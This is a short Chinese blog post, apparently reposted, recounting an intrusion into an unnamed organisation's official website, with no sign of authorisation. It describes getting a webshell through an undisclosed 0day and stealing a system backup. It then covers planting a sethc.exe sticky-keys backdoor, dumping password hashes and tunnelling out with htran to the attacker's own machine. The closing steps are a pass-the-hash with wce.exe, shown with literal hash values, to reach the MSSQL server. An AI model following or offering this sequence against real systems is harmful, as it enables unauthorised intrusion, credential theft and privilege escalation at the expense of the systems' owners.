原文： http://26836659.blogcn.com/articles/%E6%9F%90%E5%AE%98%E7%BD%91%E7%9A%84%E6%B8%97%E9%80%8F%E7%AC%94%E8%AE%B0.html 某官网的渗透笔记，挖掘的某0DAY拿到webshell，USER权限，联通外网，提权SYSTEM的EXP无效，看来打的补丁很全，服务器用的是微软FTP,MSSQL，没啥突破口。路过其他盘，发现一个小有年份的BKF文件，貌似这个是用于系统的恢复和还原的.复制到WEB 目录下回来。装个虚拟机还原BKF文件。虚拟机就变成目标主机的系统了。没有密码登陆不进去了。插入WINPE光盘，替换sethc.exe ，做个shift后门，按5次shift进入主机，再新建一个帐号登陆。用pwdump抓hash，不幸的是ophcrack 没跑出来，既然有目标主机的hash了。转换下思路。 本地执行htran -s -listen 1234 8080 webshel??l执行htran -s -connect 本机IP 1234 得到一条8080的SOCK5代理 本地设置ProxyCap允许所有程序通过此代理连接，然后 wce.exe -s administrator EVIL:25E42477F38A0E69181747D7808C7C1E:32F081A735766AD4CA68B15F6612CD7C 替换HASH 打开SQL Server 管理器，填写目标IP，选择WINDOWS认证，OK，成功登陆目标的SQL。接下来SQL提权。不多说了。